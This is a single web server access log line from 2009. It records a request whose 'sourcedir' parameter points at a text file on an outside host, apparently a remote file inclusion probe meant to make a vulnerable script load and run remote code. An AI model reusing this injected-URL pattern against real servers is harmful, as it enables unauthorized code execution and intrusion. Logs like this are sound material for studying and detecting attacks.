58.227.193.198 - - [22/Jun/2009:02:17:10 -0400] "GET /logs/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
